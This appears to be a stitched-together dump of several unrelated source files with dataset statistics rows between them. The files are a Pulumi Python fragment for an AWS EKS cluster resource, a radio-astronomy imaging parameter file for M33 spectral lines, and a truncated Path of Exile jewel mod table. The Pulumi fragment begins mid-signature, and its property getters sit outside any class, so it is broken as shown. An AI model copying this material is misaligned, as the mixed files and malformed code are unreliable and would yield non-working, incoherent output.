        certificate_authority: Optional[pulumi.Input[pulumi.InputType['ClusterCertificateAuthorityArgs']]] = None,
        created_at: Optional[pulumi.Input[str]] = None,
        enabled_cluster_log_types: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
        encryption_config: Optional[pulumi.Input[pulumi.InputType['ClusterEncryptionConfigArgs']]] = None,
        endpoint: Optional[pulumi.Input[str]] = None,
        identities: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['ClusterIdentityArgs']]]]] = None,
        kubernetes_network_config: Optional[pulumi.Input[pulumi.InputType['ClusterKubernetesNetworkConfigArgs']]] = None,
        name: Optional[pulumi.Input[str]] = None,
        platform_version: Optional[pulumi.Input[str]] = None,
        role_arn: Optional[pulumi.Input[str]] = None,
        status: Optional[pulumi.Input[str]] = None,
        tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
        tags_all: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
        version: Optional[pulumi.Input[str]] = None,
        vpc_config: Optional[pulumi.Input[pulumi.InputType['ClusterVpcConfigArgs']]] = None) -> 'Cluster':
    """
    Get an existing Cluster resource's state with the given name, id, and optional extra
    properties used to qualify the lookup.

    :param str resource_name: The unique name of the resulting resource.
    :param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
    :param pulumi.ResourceOptions opts: Options for the resource.
    :param pulumi.Input[str] arn: ARN of the cluster.
    :param pulumi.Input[pulumi.InputType['ClusterCertificateAuthorityArgs']] certificate_authority: Attribute block containing `certificate-authority-data` for your cluster.
    :param pulumi.Input[str] created_at: Unix epoch timestamp in seconds for when the cluster was created.
    :param pulumi.Input[Sequence[pulumi.Input[str]]] enabled_cluster_log_types: List of the desired control plane logging to enable. See [Amazon EKS Control Plane Logging](https://docs.aws.amazon.com/eks/latest/userguide/control-plane-logs.html).
    :param pulumi.Input[pulumi.InputType['ClusterEncryptionConfigArgs']] encryption_config: Configuration block with encryption configuration for the cluster.
    :param pulumi.Input[str] endpoint: Endpoint for your Kubernetes API server.
    :param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['ClusterIdentityArgs']]]] identities: Attribute block containing identity provider information for your cluster.
    :param pulumi.Input[pulumi.InputType['ClusterKubernetesNetworkConfigArgs']] kubernetes_network_config: Configuration block with kubernetes network configuration for the cluster.
    :param pulumi.Input[str] name: Name of the cluster (`^[0-9A-Za-z][A-Za-z0-9\-_]+$`, 1-100 characters).
    :param pulumi.Input[str] platform_version: Platform version for the cluster.
    :param pulumi.Input[str] role_arn: ARN of the IAM role used by the Kubernetes control plane for AWS API calls.
    :param pulumi.Input[str] status: Status of the EKS cluster. One of `CREATING`, `ACTIVE`, `DELETING`, `FAILED`.
    :param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags: Key-value map of resource tags.
    :param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags_all: Map of tags assigned to the resource, including those inherited from the provider.
    :param pulumi.Input[str] version: Desired Kubernetes master version.
    :param pulumi.Input[pulumi.InputType['ClusterVpcConfigArgs']] vpc_config: Configuration block for the VPC associated with your cluster. See [Cluster VPC Considerations](https://docs.aws.amazon.com/eks/latest/userguide/network_reqs.html).
    """
    opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
    __props__ = _ClusterState.__new__(_ClusterState)
    # Copy every piece of supplied state onto the fresh state object.
    __props__.__dict__.update({
        "arn": arn,
        "certificate_authority": certificate_authority,
        "created_at": created_at,
        "enabled_cluster_log_types": enabled_cluster_log_types,
        "encryption_config": encryption_config,
        "endpoint": endpoint,
        "identities": identities,
        "kubernetes_network_config": kubernetes_network_config,
        "name": name,
        "platform_version": platform_version,
        "role_arn": role_arn,
        "status": status,
        "tags": tags,
        "tags_all": tags_all,
        "version": version,
        "vpc_config": vpc_config,
    })
    return Cluster(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter
def arn(self) -> pulumi.Output[str]:
    """
    ARN of the cluster.

    Output-only: initialised to None at creation and populated by the provider.
    """
    return pulumi.get(self, "arn")
@property
@pulumi.getter(name="certificateAuthority")
def certificate_authority(self) -> pulumi.Output['outputs.ClusterCertificateAuthority']:
    """
    Attribute block containing `certificate-authority-data` for your cluster. Detailed below.

    Output-only: initialised to None at creation and populated by the provider.
    """
    return pulumi.get(self, "certificate_authority")
@property
@pulumi.getter(name="createdAt")
def created_at(self) -> pulumi.Output[str]:
    """
    Unix epoch timestamp in seconds for when the cluster was created.

    Output-only: initialised to None at creation and populated by the provider.
    """
    return pulumi.get(self, "created_at")
@property
@pulumi.getter(name="enabledClusterLogTypes")
def enabled_cluster_log_types(self) -> pulumi.Output[Optional[Sequence[str]]]:
    """
    List of the desired control plane logging to enable. For more information, see [Amazon EKS Control Plane Logging](https://docs.aws.amazon.com/eks/latest/userguide/control-plane-logs.html).

    Optional input; None when no log types were configured.
    """
    return pulumi.get(self, "enabled_cluster_log_types")
@property
@pulumi.getter(name="encryptionConfig")
def encryption_config(self) -> pulumi.Output[Optional['outputs.ClusterEncryptionConfig']]:
    """
    Configuration block with encryption configuration for the cluster. Only available on Kubernetes 1.13 and above clusters created after March 6, 2020. Detailed below.

    Optional input; None when no encryption configuration was set.
    """
    return pulumi.get(self, "encryption_config")
@property
@pulumi.getter
def endpoint(self) -> pulumi.Output[str]:
    """
    Endpoint for your Kubernetes API server.

    Output-only: initialised to None at creation and populated by the provider.
    """
    return pulumi.get(self, "endpoint")
@property
@pulumi.getter
def identities(self) -> pulumi.Output[Sequence['outputs.ClusterIdentity']]:
    """
    Attribute block containing identity provider information for your cluster. Only available on Kubernetes version 1.13 and 1.14 clusters created or upgraded on or after September 3, 2019. Detailed below.

    Output-only: initialised to None at creation and populated by the provider.
    """
    return pulumi.get(self, "identities")
@property
@pulumi.getter(name="kubernetesNetworkConfig")
def kubernetes_network_config(self) -> pulumi.Output['outputs.ClusterKubernetesNetworkConfig']:
    """
    Configuration block with kubernetes network configuration for the cluster. Detailed below. If removed, this provider will only perform drift detection if a configuration value is provided.

    NOTE(review): the input is optional but the output type here is
    non-Optional, so the provider presumably always resolves a value — confirm.
    """
    return pulumi.get(self, "kubernetes_network_config")
@property
@pulumi.getter
def name(self) -> pulumi.Output[str]:
    """
    Name of the cluster. Must be between 1-100 characters in length. Must begin with an alphanumeric character, and must only contain alphanumeric characters, dashes and underscores (`^[0-9A-Za-z][A-Za-z0-9\-_]+$`).
    """
    return pulumi.get(self, "name")
@property
@pulumi.getter(name="platformVersion")
def platform_version(self) -> pulumi.Output[str]:
    """
    Platform version for the cluster.

    Output-only: initialised to None at creation and populated by the provider.
    """
    return pulumi.get(self, "platform_version")
@property
@pulumi.getter(name="roleArn")
def role_arn(self) -> pulumi.Output[str]:
    """
    ARN of the IAM role that provides permissions for the Kubernetes control plane to make calls to AWS API operations on your behalf.

    Required input at resource creation.
    """
    return pulumi.get(self, "role_arn")
@property
@pulumi.getter
def status(self) -> pulumi.Output[str]:
    """
    Status of the EKS cluster. One of `CREATING`, `ACTIVE`, `DELETING`, `FAILED`.

    Output-only: initialised to None at creation and populated by the provider.
    """
    return pulumi.get(self, "status")
@property
@pulumi.getter
def tags(self) -> pulumi.Output[Optional[Mapping[str, str]]]:
    """
    Key-value map of resource tags.

    Optional input; None when no tags were configured.
    """
    return pulumi.get(self, "tags")
@property
@pulumi.getter(name="tagsAll")
def tags_all(self) -> pulumi.Output[Mapping[str, str]]:
    """
    Map of tags assigned to the resource, including those inherited from the provider.

    Output-only: initialised to None at creation and populated by the provider.
    """
    return pulumi.get(self, "tags_all")
@property
@pulumi.getter
def version(self) -> pulumi.Output[str]:
    """
    Desired Kubernetes master version. If you do not specify a value, the latest available version at resource creation is used and no upgrades will occur except those automatically triggered by EKS. The value must be configured and increased to upgrade the version when desired. Downgrades are not supported by EKS.
    """
    return pulumi.get(self, "version")
@property
@pulumi.getter(name="vpcConfig")
def vpc_config(self) -> pulumi.Output['outputs.ClusterVpcConfig']:
    """
    Configuration block for the VPC associated with your cluster. Amazon EKS VPC resources have specific requirements to work properly with Kubernetes. For more information, see [Cluster VPC Considerations](https://docs.aws.amazon.com/eks/latest/userguide/network_reqs.html) and [Cluster Security Group Considerations](https://docs.aws.amazon.com/eks/latest/userguide/sec-group-reqs.html) in the Amazon EKS User Guide. Detailed below. Also contains attributes detailed in the Attributes section.

    Required input at resource creation.
    """
    return pulumi.get(self, "vpc_config")
| 55.981588
| 573
| 0.685331
| 5,773
| 48,648
| 5.613026
| 0.063052
| 0.065856
| 0.044501
| 0.029873
| 0.914825
| 0.898222
| 0.878719
| 0.86693
| 0.859061
| 0.83323
| 0
| 0.004686
| 0.214747
| 48,648
| 868
| 574
| 56.046083
| 0.843564
| 0.491737
| 0
| 0.664336
| 1
| 0
| 0.139554
| 0.070501
| 0
| 0
| 0
| 0
| 0
| 1
| 0.165501
| false
| 0.002331
| 0.016317
| 0
| 0.284382
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
b94238a08130bc004b45ea5500c22342b7111140
| 5,491
|
py
|
Python
|
imaging/line_imaging_params.py
|
Astroua/M33_CO21_ACA_mapping
|
9e312ef83e9b231a8eabc98a87518404295228bf
|
[
"MIT"
] | null | null | null |
imaging/line_imaging_params.py
|
Astroua/M33_CO21_ACA_mapping
|
9e312ef83e9b231a8eabc98a87518404295228bf
|
[
"MIT"
] | null | null | null |
imaging/line_imaging_params.py
|
Astroua/M33_CO21_ACA_mapping
|
9e312ef83e9b231a8eabc98a87518404295228bf
|
[
"MIT"
] | null | null | null |
'''
Define imaging parameters for each line.
'''


def _line_imaging_params(fine_width, mid_width):
    """
    Build the per-channel-width imaging setups for one spectral line.

    Every line shares the same spatial gridding (1 arcsec cells on a
    512x512 image), velocity start (-280 km/s) and channel counts; only
    the two finest channel widths differ between species, so they are
    the parameters.

    :param fine_width: Channel width string for the "0p7kms" setup
        (e.g. "0.67km/s" or "0.7km/s").
    :param mid_width: Channel width string for the "1p3kms" setup
        (e.g. "1.34km/s" or "1.4km/s").
    :return: dict mapping setup name -> imaging keyword dict with keys
        'cellsize', 'imsize', 'width', 'start', 'nchan'.
    """

    def _setup(width, start, nchan):
        # Build a fresh dict (and a fresh imsize list) per entry so that
        # mutating one setup can never affect another.
        return {'cellsize': '1arcsec', 'imsize': [512, 512],
                'width': width, 'start': start, 'nchan': nchan}

    return {"native": _setup(1, 1, -1),
            "0p7kms": _setup(fine_width, "-280km/s", 300),
            "1p3kms": _setup(mid_width, "-280km/s", 150),
            "2kms": _setup("2.0km/s", "-280km/s", 100),
            "2p6kms": _setup("2.6km/s", "-280km/s", 77)}


# The CO isotopologues use slightly narrower fine channels (0.67/1.34 km/s)
# than the H2CO lines (0.7/1.4 km/s); this preserves the original values.
imaging_linedict = {
    '12CO21': _line_imaging_params("0.67km/s", "1.34km/s"),
    '13CO21': _line_imaging_params("0.67km/s", "1.34km/s"),
    'C18O21': _line_imaging_params("0.67km/s", "1.34km/s"),
    'H2CO_303_202': _line_imaging_params("0.7km/s", "1.4km/s"),
    'H2CO_322_221': _line_imaging_params("0.7km/s", "1.4km/s"),
    'H2CO_321_220': _line_imaging_params("0.7km/s", "1.4km/s"),
}
| 59.684783
| 77
| 0.343471
| 452
| 5,491
| 4.15708
| 0.097345
| 0.239489
| 0.335285
| 0.383183
| 0.954763
| 0.954763
| 0.954763
| 0.954763
| 0.954763
| 0.954763
| 0
| 0.163636
| 0.449099
| 5,491
| 91
| 78
| 60.340659
| 0.457521
| 0.007285
| 0
| 0.906977
| 0
| 0
| 0.306505
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 11
|
b97fdfe7f05114b0f1e1ddcb4a253a4f7d2c5a72
| 513,292
|
py
|
Python
|
mod_table.py
|
xanthics/poe_fractured
|
e7627dcc714af4ebf20a0dabfbd19cc82b73c9d4
|
[
"MIT"
] | 3
|
2019-03-20T12:02:31.000Z
|
2020-02-26T12:40:24.000Z
|
mod_table.py
|
xanthics/poe_fractured
|
e7627dcc714af4ebf20a0dabfbd19cc82b73c9d4
|
[
"MIT"
] | 2
|
2019-03-23T19:05:43.000Z
|
2019-04-02T02:38:39.000Z
|
mod_table.py
|
xanthics/poe_fractured
|
e7627dcc714af4ebf20a0dabfbd19cc82b73c9d4
|
[
"MIT"
] | null | null | null |
table = {
"Abyss Jewel": {
"# Energy Shield Regenerated per second": [(30, '(3 - 4) to maximum Energy Shield'), (100, '0.2% of Energy Shield Regenerated per second')],
"# Life Regenerated per second": [(27.0, '(3 - 4) to maximum Life'), (83.33, '0.2% of Life Regenerated per second')],
"# Mana Regenerated per second": [(7.0, '(2 - 3) to maximum Mana'), (16.67, '(5 - 7)% increased Mana Regeneration Rate')],
"#% additional Physical Damage Reduction against Abyssal Monsters": [(15, '(-7 - -5) Physical Damage taken from Attacks'), (50, '(-10 - -8) Physical Damage taken from Attacks')],
"#% additional Physical Damage Reduction if you weren't Damaged by a Hit Recently": [(4, '(-7 - -5) Physical Damage taken from Attacks'), (10, '(-10 - -8) Physical Damage taken from Attacks')],
"#% chance to Avoid being Frozen": [(24, '(5 - 7)% reduced Elemental Ailment Duration on you'), (50, '(3 - 5)% chance to Avoid being Frozen')],
"#% chance to Avoid being Ignited": [(24, '(5 - 7)% reduced Elemental Ailment Duration on you'), (50, '(3 - 5)% chance to Avoid being Ignited')],
"#% chance to Avoid being Poisoned": [(24, '(5 - 7)% reduced Elemental Ailment Duration on you'), (50, '(3 - 5)% chance to Avoid being Poisoned')],
"#% chance to Avoid being Shocked": [(24, '(5 - 7)% reduced Elemental Ailment Duration on you'), (50, '(3 - 5)% chance to Avoid being Shocked')],
"#% chance to Avoid being Stunned": [(25, '(6 - 7)% increased Stun and Block Recovery'), (100, '(3 - 5)% chance to Avoid being Stunned')],
"#% chance to Avoid interruption from Stuns while Casting": [(55, '(6 - 7)% increased Stun and Block Recovery'), (100, '(8 - 10)% chance to Avoid interruption from Stuns while Casting')],
"#% chance to Blind Enemies on Hit with Attacks": [(15, '(1 - 2)% chance to Blind Enemies on Hit with Attacks'), (50, '(3 - 4)% chance to Blind Enemies on Hit with Attacks')],
"#% chance to Dodge Attack and Spell Hits if you've been Hit Recently": [(4, '(3 - 4)% increased Evasion Rating'), (10, '(5 - 7)% chance to Avoid Elemental Ailments')],
"#% chance to Gain Unholy Might for 4 seconds on Melee Kill": [(12, '(6 - 8)% increased Physical Damage while you have Unholy Might'), (50, '(9 - 10)% increased Physical Damage while you have Unholy Might')],
"#% chance to Hinder Enemies on Hit with Spells, with 30% reduced Movement Speed": [(20, '(1 - 2)% chance to Hinder Enemies on Hit with Spells, with 30% reduced Movement Speed'), (50, '(3 - 4)% chance to Hinder Enemies on Hit with Spells, with 30% reduced Movement Speed')],
"#% chance to Taunt Enemies on Hit with Attacks": [(20, '(1 - 2)% chance to Taunt Enemies on Hit with Attacks'), (50, '(3 - 4)% chance to Taunt Enemies on Hit with Attacks')],
"#% chance to avoid Bleeding": [(24, '(5 - 7)% reduced Elemental Ailment Duration on you'), (50, '(3 - 5)% chance to avoid Bleeding')],
"#% chance to gain Onslaught for 4 seconds on Kill": [(20, '(2 - 3)% increased Attack and Cast Speed during Onslaught'), (50, '(4 - 5)% increased Attack and Cast Speed during Onslaught')],
"#% chance to gain Onslaught when you use a Flask": [(26, '1% increased Attack and Cast Speed'), (50, '2% increased Attack Speed\n2% increased Cast Speed')],
"#% chance to gain Phasing for 4 seconds on Kill": [(20, '2% increased Movement Speed while Phasing'), (50, '3% increased Movement Speed while Phasing')],
"#% increased Accuracy Rating if you haven't Killed Recently": [(70, '(21 - 35) to Accuracy Rating'), (150, '(36 - 50) to Accuracy Rating')],
"#% increased Armour if you haven't Killed Recently": [(80, '(3 - 4)% increased Armour'), (150, '(5 - 6)% increased Armour')],
"#% increased Attack Speed": [(10, '1% increased Attack Speed'), (50, '2% increased Attack Speed')],
"#% increased Attack Speed if you've dealt a Critical Strike Recently": [(20, '1% increased Attack Speed'), (50, '2% increased Attack Speed')],
"#% increased Cast Speed": [(10, '1% increased Cast Speed'), (50, '2% increased Cast Speed')],
"#% increased Cast Speed if you've dealt a Critical Strike Recently": [(18, '1% increased Cast Speed'), (50, '2% increased Cast Speed')],
"#% increased Critical Strike Chance if you haven't dealt a Critical Strike Recently": [(80, '2% increased Global Critical Strike Chance'), (200, '(3 - 4)% increased Global Critical Strike Chance')],
"#% increased Damage against Abyssal Monsters": [(100, '2% increased Damage'), (200, '(3 - 4)% increased Damage')],
"#% increased Damage if you've Killed Recently": [(50, '2% increased Damage'), (100, '(3 - 4)% increased Damage')],
"#% increased Damage over Time while Dual Wielding": [(35, '(2 - 3)% increased Damage over Time'), (100, '(4 - 5)% increased Damage over Time')],
"#% increased Damage over Time while holding a Shield": [(35, '(2 - 3)% increased Damage over Time'), (100, '(4 - 5)% increased Damage over Time')],
"#% increased Damage over Time while wielding a Two Handed Weapon": [(35, '(2 - 3)% increased Damage over Time'), (100, '(4 - 5)% increased Damage over Time')],
"#% increased Damage with Ailments": [(50, '(2 - 3)% increased Damage with Ailments'), (100, '(4 - 5)% increased Damage with Ailments')],
"#% increased Effect of Chill": [(26, '(2 - 3)% increased Chill Duration on Enemies'), (50, '(4 - 5)% increased Chill Duration on Enemies\n(2 - 3)% increased Effect of Chill')],
"#% increased Effect of Shock": [(26, '(2 - 3)% increased Shock Duration on Enemies'), (50, '(4 - 5)% increased Shock Duration on Enemies\n(2 - 3)% increased Effect of Shock')],
"#% increased Evasion Rating while moving": [(100, '(3 - 4)% increased Evasion Rating'), (500, '(5 - 6)% increased Evasion Rating')],
"#% increased Global Critical Strike Chance": [(30, '2% increased Global Critical Strike Chance'), (100, '(3 - 4)% increased Global Critical Strike Chance')],
"#% increased Global Defences": [(16, '(3 - 4)% increased Armour\n(3 - 4)% increased Evasion Rating\n(3 - 4) to maximum Energy Shield'), (50, '(5 - 6)% increased Armour\n(5 - 6)% increased Evasion Rating\n(5 - 6) to maximum Energy Shield')],
"#% increased Mana Regeneration Rate while moving": [(60, '(2 - 3) to maximum Mana'), (100, '(5 - 7)% increased Mana Regeneration Rate')],
"#% increased Minion Damage if you've used a Minion Skill Recently": [(45, 'Minions deal (2 - 3)% increased Damage'), (100, 'Minions deal (4 - 5)% increased Damage')],
"#% increased Movement Speed if you haven't taken Damage Recently": [(10, '1% increased Movement Speed'), (20, '2% increased Movement Speed')],
"#% increased Movement Speed if you've Killed Recently": [(10, '1% increased Movement Speed'), (20, '2% increased Movement Speed')],
"#% of Attack Damage Leeched as Life": [(0.8, '(3 - 4) to maximum Life'), (1.5, '0.2% of Attack Damage Leeched as Life')],
"#% of Damage taken gained as Mana over 4 seconds when Hit": [(7, '(2 - 3) to maximum Mana'), (20, '(5 - 7)% increased Mana Regeneration Rate')],
"#% of Energy Shield Regenerated per second if you've Hit an Enemy Recently": [(0.8, '(3 - 4) to maximum Energy Shield'), (1.67, '(5 - 6) to maximum Energy Shield')],
"#% of Life Regenerated per second": [(0.8, '(3 - 4) to maximum Life'), (1.67, '0.2% of Life Regenerated per second')],
"#% of Life Regenerated per second while moving": [(1.67, '(3 - 4) to maximum Life'), (8.33, '0.2% of Life Regenerated per second')],
"#% reduced Physical Damage taken over time": [(4, '(-7 - -5) Physical Damage taken from Attacks'), (10, '(-10 - -8) Physical Damage taken from Attacks')],
"+# to Accuracy Rating": [(600, '(21 - 35) to Accuracy Rating'), (2000, '(36 - 50) to Accuracy Rating')],
"+# to Armour": [(450, '(3 - 4)% increased Armour'), (1000, '(5 - 6)% increased Armour')],
"+# to Armour if you've Hit an Enemy Recently": [(800, '(3 - 4)% increased Armour'), (2000, '(5 - 6)% increased Armour')],
"+# to Dexterity": [(42, '(2 - 3) to Dexterity'), (100, '(4 - 5) to Dexterity')],
"+# to Dexterity and Intelligence": [(27, '(2 - 3) to Dexterity\n(2 - 3) to Intelligence'), (100, '(4 - 5) to Dexterity\n(4 - 5) to Intelligence')],
"+# to Evasion Rating": [(450, '(3 - 4)% increased Evasion Rating'), (1000, '(5 - 6)% increased Evasion Rating')],
"+# to Evasion Rating if Hit an Enemy Recently": [(800, '(3 - 4)% increased Evasion Rating'), (2000, '(5 - 6)% increased Evasion Rating')],
"+# to Intelligence": [(42, '(2 - 3) to Intelligence'), (100, '(4 - 5) to Intelligence')],
"+# to Strength": [(42, '(2 - 3) to Strength'), (100, '(4 - 5) to Strength')],
"+# to Strength and Dexterity": [(27, '(2 - 3) to Strength\n(2 - 3) to Dexterity'), (100, '(4 - 5) to Strength\n(4 - 5) to Dexterity')],
"+# to Strength and Intelligence": [(27, '(2 - 3) to Strength\n(2 - 3) to Intelligence'), (100, '(4 - 5) to Strength\n(4 - 5) to Intelligence')],
"+# to all Attributes": [(20, '(2 - 3) to Strength\n(2 - 3) to Dexterity\n(2 - 3) to Intelligence'), (50, '(4 - 5) to Strength\n(4 - 5) to Dexterity\n(4 - 5) to Intelligence')],
"+# to maximum Energy Shield": [(135, '(3 - 4) to maximum Energy Shield'), (500, '(5 - 6) to maximum Energy Shield')],
"+# to maximum Life": [(130, '(3 - 4) to maximum Life'), (500, '(5 - 6) to maximum Life')],
"+# to maximum Mana": [(130, '(2 - 3) to maximum Mana'), (500, '(4 - 5) to maximum Mana')],
"+#% Chance to Block Attack Damage if you were Damaged by a Hit Recently": [(4, '(6 - 7)% increased Stun and Block Recovery'), (10, '(4 - 6) Life gained when you Block')],
"+#% Chance to Block Spell Damage if you were Damaged by a Hit Recently": [(4, '(6 - 7)% increased Stun and Block Recovery'), (10, '(3 - 5) Mana gained when you Block')],
"+#% to Chaos Resistance": [(100, '(2 - 3) to Chaos Resistance')],
"+#% to Cold Resistance": [(35, '(2 - 3) to Cold Resistance'), (100, '(4 - 5) to Cold Resistance')],
"+#% to Cold and Lightning Resistances": [(34, '(2 - 3) to Cold Resistance\n(2 - 3) to Lightning Resistance'), (100, '(4 - 5) to Cold Resistance\n(4 - 5) to Lightning Resistance')],
"+#% to Critical Strike Multiplier if you've Killed Recently": [(36, '2 to Global Critical Strike Multiplier'), (100, '(3 - 4) to Global Critical Strike Multiplier')],
"+#% to Fire Resistance": [(35, '(2 - 3) to Fire Resistance'), (100, '(4 - 5) to Fire Resistance')],
"+#% to Fire and Cold Resistances": [(34, '(2 - 3) to Fire Resistance\n(2 - 3) to Cold Resistance'), (100, '(4 - 5) to Fire Resistance\n(4 - 5) to Cold Resistance')],
"+#% to Fire and Lightning Resistances": [(34, '(2 - 3) to Fire Resistance\n(2 - 3) to Lightning Resistance'), (100, '(4 - 5) to Fire Resistance\n(4 - 5) to Lightning Resistance')],
"+#% to Global Critical Strike Multiplier": [(30, '2 to Global Critical Strike Multiplier'), (100, '(3 - 4) to Global Critical Strike Multiplier')],
"+#% to Lightning Resistance": [(35, '(2 - 3) to Lightning Resistance'), (100, '(4 - 5) to Lightning Resistance')],
"+#% to all Elemental Resistances": [(28, '(2 - 3) to Fire Resistance\n(2 - 3) to Cold Resistance\n(2 - 3) to Lightning Resistance'), (100, '(4 - 5) to Fire Resistance\n(4 - 5) to Cold Resistance\n(4 - 5) to Lightning Resistance')],
"Adds # to # Chaos Damage to Attacks": [(16, '(3 - 4)% increased Chaos Damage with Attack Skills'), (100, '(5 - 6)% increased Chaos Damage with Attack Skills')],
"Adds # to # Chaos Damage to Spells": [(45, '(3 - 4)% increased Chaos Damage with Spell Skills'), (100, '(5 - 6)% increased Chaos Damage with Spell Skills')],
"Adds # to # Chaos Damage to Spells while Dual Wielding": [(60, '(2 - 3)% increased Critical Strike Chance for Spells while Dual Wielding'), (200, '(4 - 5)% increased Critical Strike Chance for Spells while Dual Wielding')],
"Adds # to # Chaos Damage to Spells while holding a Shield": [(60, '(2 - 3)% increased Critical Strike Chance for Spells while holding a Shield'), (200, '(4 - 5)% increased Critical Strike Chance for Spells while holding a Shield')],
"Adds # to # Chaos Damage to Spells while wielding a Two Handed Weapon": [(60, '(2 - 3)% increased Critical Strike Chance for Spells while wielding a Staff'), (200, '(4 - 5)% increased Critical Strike Chance for Spells while wielding a Staff')],
"Adds # to # Cold Damage to Attacks": [(95, '(3 - 4)% increased Cold Damage with Attack Skills'), (200, '(5 - 6)% increased Cold Damage with Attack Skills')],
"Adds # to # Cold Damage to Axe Attacks": [(102, '(2 - 3)% increased Accuracy Rating with Axes'), (500, '(4 - 5)% increased Accuracy Rating with Axes')],
"Adds # to # Cold Damage to Bow Attacks": [(102, '(2 - 3)% increased Accuracy Rating with Bows'), (500, '(4 - 5)% increased Accuracy Rating with Bows')],
"Adds # to # Cold Damage to Claw Attacks": [(102, '(2 - 3)% increased Accuracy Rating with Claws'), (500, '(4 - 5)% increased Accuracy Rating with Claws')],
"Adds # to # Cold Damage to Dagger Attacks": [(102, '(2 - 3)% increased Accuracy Rating with Daggers'), (500, '(4 - 5)% increased Accuracy Rating with Daggers')],
"Adds # to # Cold Damage to Mace Attacks": [(102, '(2 - 3)% increased Accuracy Rating with Maces'), (500, '(4 - 5)% increased Accuracy Rating with Maces')],
"Adds # to # Cold Damage to Spells": [(70, '(3 - 4)% increased Cold Damage with Spell Skills'), (200, '(5 - 6)% increased Cold Damage with Spell Skills')],
"Adds # to # Cold Damage to Spells while Dual Wielding": [(80, '(0.5 - 0.67) Mana Regenerated per Second while Dual Wielding'), (200, '(0.83 - 1.0) Mana Regenerated per Second while Dual Wielding')],
"Adds # to # Cold Damage to Spells while holding a Shield": [(80, '(0.5 - 0.67) Mana Regenerated per Second while holding a Shield'), (200, '(0.83 - 1.0) Mana Regenerated per Second while holding a Shield')],
"Adds # to # Cold Damage to Spells while wielding a Two Handed Weapon": [(80, '(0.5 - 0.67) Mana Regenerated per Second while wielding a Staff'), (200, '(0.83 - 1.0) Mana Regenerated per Second while wielding a Staff')],
"Adds # to # Cold Damage to Staff Attacks": [(102, '(2 - 3)% increased Accuracy Rating with Staves'), (500, '(4 - 5)% increased Accuracy Rating with Staves')],
"Adds # to # Cold Damage to Sword Attacks": [(102, '(2 - 3)% increased Accuracy Rating with Swords'), (500, '(4 - 5)% increased Accuracy Rating with Swords')],
"Adds # to # Cold Damage to Wand Attacks": [(102, '(2 - 3)% increased Accuracy Rating with Wands'), (500, '(4 - 5)% increased Accuracy Rating with Wands')],
"Adds # to # Fire Damage to Attacks": [(100, '(3 - 4)% increased Fire Damage with Attack Skills'), (200, '(5 - 6)% increased Fire Damage with Attack Skills')],
"Adds # to # Fire Damage to Axe Attacks": [(114, '(2 - 3) to Critical Strike Multiplier with Axes'), (500, '(4 - 5) to Critical Strike Multiplier with Axes')],
"Adds # to # Fire Damage to Bow Attacks": [(114, '(2 - 3) to Critical Strike Multiplier with Bows'), (500, '(4 - 5) to Critical Strike Multiplier with Bows')],
"Adds # to # Fire Damage to Claw Attacks": [(114, '(2 - 3) to Critical Strike Multiplier with Claws'), (500, '(4 - 5) to Critical Strike Multiplier with Claws')],
"Adds # to # Fire Damage to Dagger Attacks": [(114, '(2 - 3) to Critical Strike Multiplier with Daggers'), (500, '(4 - 5) to Critical Strike Multiplier with Daggers')],
"Adds # to # Fire Damage to Mace Attacks": [(114, '(2 - 3) to Critical Strike Multiplier with Maces'), (500, '(4 - 5) to Critical Strike Multiplier with Maces')],
"Adds # to # Fire Damage to Spells": [(70, '(3 - 4)% increased Fire Damage with Spell Skills'), (200, '(5 - 6)% increased Fire Damage with Spell Skills')],
"Adds # to # Fire Damage to Spells while Dual Wielding": [(80, '(2 - 3) to Critical Strike Multiplier for Spells while Dual Wielding'), (200, '(4 - 5) to Critical Strike Multiplier for Spells while Dual Wielding')],
"Adds # to # Fire Damage to Spells while holding a Shield": [(80, '(2 - 3) to Critical Strike Multiplier for Spells while holding a Shield'), (200, '(4 - 5) to Critical Strike Multiplier for Spells while holding a Shield')],
"Adds # to # Fire Damage to Spells while wielding a Two Handed Weapon": [(80, '(2 - 3) to Critical Strike Multiplier for Spells while wielding a Staff'), (200, '(4 - 5) to Critical Strike Multiplier for Spells while wielding a Staff')],
"Adds # to # Fire Damage to Staff Attacks": [(114, '(2 - 3) to Critical Strike Multiplier with Staves'), (500, '(4 - 5) to Critical Strike Multiplier with Staves')],
"Adds # to # Fire Damage to Sword Attacks": [(114, '(2 - 3) to Critical Strike Multiplier with Swords'), (500, '(4 - 5) to Critical Strike Multiplier with Swords')],
"Adds # to # Fire Damage to Wand Attacks": [(114, '(2 - 3) to Critical Strike Multiplier with Wands'), (500, '(4 - 5) to Critical Strike Multiplier with Wands')],
"Adds # to # Lightning Damage to Attacks": [(160, '(3 - 4)% increased Lightning Damage with Attack Skills'), (300, '(5 - 6)% increased Lightning Damage with Attack Skills')],
"Adds # to # Lightning Damage to Axe Attacks": [(183, '(1 - 2)% increased Attack Speed with Axes'), (500, '3% increased Attack Speed with Axes')],
"Adds # to # Lightning Damage to Bow Attacks": [(183, '(1 - 2)% increased Attack Speed with Bows'), (500, '3% increased Attack Speed with Bows')],
"Adds # to # Lightning Damage to Claw Attacks": [(183, '(1 - 2)% increased Attack Speed with Claws'), (500, '3% increased Attack Speed with Claws')],
